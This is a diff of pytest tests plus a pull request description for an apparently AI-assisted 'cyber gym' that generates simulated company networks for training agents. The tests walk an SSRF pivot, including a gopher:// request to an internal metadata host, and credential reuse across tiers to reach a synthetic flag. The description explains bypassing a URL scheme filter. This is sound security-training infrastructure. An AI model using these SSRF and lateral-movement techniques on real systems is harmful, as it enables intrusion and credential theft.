+        for e in graph.edges.values()
+        if e.kind == "holds" and e.dst == "secret_flag"
+    )
+    assert record.attrs["fields"]["value"] != flag
+
+
+def test_lateral_solves_on_process(tmp_path) -> None:
+    snap = _admit()
+    graph = snap.graph
+    flag = str(graph.nodes["secret_flag"].attrs["value_ref"])
+    ssrf_url, param = _ssrf_entry(graph)
+    meta_host = _metadata_host(graph)
+
+    pentest = next(t for t in snap.tasks if t.meta.get("family") == "webapp.pentest")
+    svc = EpisodeService(WebappPack(), tmp_path)
+    try:
+        handle = svc.start_episode(snap, pentest.id)
+        base = str(svc.surface(handle)["base_url"])
+        cfg, no_cred, with_cred = _solve(base, ssrf_url, param, meta_host)
+        assert flag not in cfg  # the metadata leaks the credential, never the flag
+        assert flag not in no_cred  # the gate denies without the reused credential
+        assert flag in with_cred  # reusing the leaked credential opens the vault
+        # The db's own default endpoint cannot leak it either — only the gate can.
+        _, db_default = _get(base, ssrf_url, {param: f"gopher://{meta_host}/records"})
+        assert flag not in db_default
+    finally:
+        svc.close()
+
+
+def test_lateral_world_is_deterministic() -> None:
+    assert _admit().snapshot_id == _admit().snapshot_id
+
+
+def _docker_available() -> bool:
+    if shutil.which("docker") is None:
+        return False
+    try:
+        probe = subprocess.run(
+            ["docker", "info"], capture_output=True, timeout=10, check=False
+        )
+    except Exception:  # noqa: BLE001 - any failure means "no"
+        return False
+    return probe.returncode == 0
+
+
+@pytest.mark.skipif(not _docker_available(), reason="docker engine not reachable")
+def test_lateral_solves_across_real_containers() -> None:
+    # The real sim-to-real target: credential reuse across real per-service containers.
+    # Each hop is a real fetch over the docker network; the flag lives in an internal
+    # container reachable only by pivoting, and only with the credential moved over.
+    snap = _admit()
+    graph = snap.graph
+    flag = str(graph.nodes["secret_flag"].attrs["value_ref"])
+    ssrf_url, param = _ssrf_entry(graph)
+    meta_host = _metadata_host(graph)
+
+    runtime = WebappPack().realize(graph, Backing.CONTAINER)
+    assert isinstance(runtime, NetworkedContainerWebappRuntime)
+    try:
+        runtime.reset()
+        base = str(runtime.surface()["base_url"])
+        cfg, no_cred, with_cred = _solve(base, ssrf_url, param, meta_host)
+        assert flag not in cfg
+        assert flag not in no_cred
+        assert flag in with_cred  # recovered across containers via credential reuse
+        assert "secret_flag" in runtime.collect()["leaked_secret_ids"]
+    finally:
+        runtime.stop()

--- a/tests/test_cyber_lateral.py
+++ b/tests/test_cyber_lateral.py
@@ -152,6 +152,25 @@ def test_lateral_chain_is_synthesized_and_wired() -> None:
     assert record.attrs["fields"]["value"] != flag
 
 
+def test_lateral_chain_pivots_inward_by_tier() -> None:
+    # Structure coherence: the chain pivots INWARD — its hosts' tiers never decrease
+    # (web < api < auth < db) — so lateral movement reads architecturally.
+    graph = _admit().graph
+    tier = {"web": 1, "api": 2, "auth": 3, "db": 4}
+    out = {e.src: e.dst for e in graph.edges.values() if e.kind == "enables"}
+    ep_of_vuln = {e.src: e.dst for e in graph.edges.values() if e.kind == "affects"}
+    svc_of_ep = {e.dst: e.src for e in graph.edges.values() if e.kind == "exposes"}
+    by_kind = {n.attrs.get("kind"): n.id for n in graph.by_kind("vulnerability")}
+    node = by_kind["credential_leak"]
+    tiers: list[int] = []
+    while node is not None and graph.nodes.get(node) is not None:
+        svc = svc_of_ep.get(ep_of_vuln.get(node))
+        if svc is not None:
+            tiers.append(tier.get(str(graph.nodes[svc].attrs.get("kind")), 0))
+        node = out.get(node)
+    assert tiers == sorted(tiers)  # non-decreasing — the pivot moves toward the data
+
+
 def test_lateral_synthesizes_varied_depth() -> None:
     # One preset, many depths: the engine synthesizes a distribution, not a fixed shape.
     depths = {_chain_depth(_admit(seed).graph) for seed in range(12)}

--- a/tests/test_cyber_vulnerabilities.py
+++ b/tests/test_cyber_vulnerabilities.py
@@ -48,6 +48,9 @@ def test_catalog_has_starter_vulns() -> None:
         "idor",
         "weak_credentials",
         "metadata_credential_leak",
+        "config_disclosure",
+        "credential_leak",
+        "credential_gated_flag",
     }
     assert vuln("sql_injection") is SQL_INJECTION
 
@@ -65,6 +68,9 @@ def test_vulns_for_kind_filters_by_target() -> None:
         "idor",
         "weak_credentials",
         "metadata_credential_leak",
+        "config_disclosure",
+        "credential_leak",
+        "credential_gated_flag",
     }
     assert vulns_for_kind("network") == ()
 

--- a/tests/test_cyber_vulnerabilities.py
+++ b/tests/test_cyber_vulnerabilities.py
@@ -51,6 +51,7 @@ def test_catalog_has_starter_vulns() -> None:
         "config_disclosure",
         "credential_leak",
         "credential_gated_flag",
+        "credential_gated_relay",
     }
     assert vuln("sql_injection") is SQL_INJECTION
 
@@ -71,6 +72,7 @@ def test_vulns_for_kind_filters_by_target() -> None:
         "config_disclosure",
         "credential_leak",
         "credential_gated_flag",
+        "credential_gated_relay",
     }
     assert vulns_for_kind("network") == ()
 


### PR DESCRIPTION
## What this does

Grows the cyber gym from the single 2-service SSRF world (#268) into a generator of **realistic, multi-service "company" worlds** — *synthesized as a distribution, not hand-shaped* — all opt-in and additive, so existing worlds are unchanged. Design in `packs/cyber_webapp/DESIGN.md` §11.

**Company worlds** (`manifest: {"company": true}`). ~6–8 services with coherent roles and names (`storefront` → `orders-api` → `identity` → `billing-db`), segmented dmz/internal networks, real people on the accounts (`alice.chen@…`), and a guaranteed networked SSRF pivot to an internal flag. A `config_disclosure` recon endpoint over-shares the internal hostnames so the world is solvable by *reconnaissance*, not by being told.

**Lateral movement** (`manifest: {"lateral_movement": true}`). The SSRF gains an opt-in **proxy mode**: the agent drives the pivot — bypass the scheme filter to make the public service fetch any internal host by name and forward path+query (a real `urlopen` on the container backing; the same in-process `/svc` dispatch on `PROCESS`, so cross-backing parity holds). On top of it the engine **synthesizes a credential-reuse chain of sampled depth** from one composable primitive: an entry host leaks a db credential, each gated host validates the credential leaked one hop back and relays the next, and the last serves the flag. One preset therefore synthesizes 1-, 2-, 3-hop chains across seeds. The flag is reachable **only** through the final gate (the db record's value is a decoy; the real flag sits in the gated secret). The chain pivots inward through the tiers (web → api → auth → db), so lateral movement reads architecturally.

## Why

The gym's value is the *synthesis* — a large, diverse, solvable distribution of worlds that transfer (sim-to-real). This makes the worlds (a) bigger and more realistic (a believable company, not 2 services), (b) **composed** rather than hand-shaped (the composable hop is the action a future MCTS sampler #193 would search over), and (c) **coherent** (real service names, real identities, an architectural chain) — all while staying procedural, **deterministic**, and solvable-by-construction.

## Testing

- **Full suite: 667 passed, 5 skipped** (env-gated).
- Both world types solve end-to-end on **PROCESS and real per-service containers** (docker-gated): recon → pivot (→ credential reuse) recovers the flag; a benign fetch, the db's default endpoint, and any gate without its credential all leak nothing.
- **Live `trl.GRPOTrainer`**: one real GRPO step trains a company world and a lateral world on `PROCESS`, and a company world on the **CONTAINER** backing (8 real per-service containers, structured reward flowing back) — confirmed trainable, not only runnable.
- Determinism (same seed → same snapshot), 20-seed admission robustness, the depth distribution, the inward-by-tier chain order, realistic naming, and cross-backing parity are pinned by tests (`tests/test_cyber_company.py`, `tests/test_cyber_lateral.py`).
- Two adversarial reviews (each finding independently verified) caught and fixed a manifest-override bug and confirmed flag-confinement + proxy security.

## Notes

Additive and opt-in: default worlds are byte-identical and the existing fixed-pivot SSRF worlds are untouched. Naming is deterministic (no rng draw), so the structural sampling stream is unchanged — worlds are the same, just coherently named. New catalog entries (`config_disclosure`, `credential_leak`, `credential_gated_flag`, `credential_gated_relay`) are internal-only — never placed by general sampling. Follows `.rules` (integration tests, no mocks, comments WHY-only). Lazy realization (#235) and MCTS (#193) are the documented next steps; the `webapp.build` family's api-only target selection is a pre-existing fragility worth widening later. The stray `open-range.zip` is untracked and not part of this PR.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
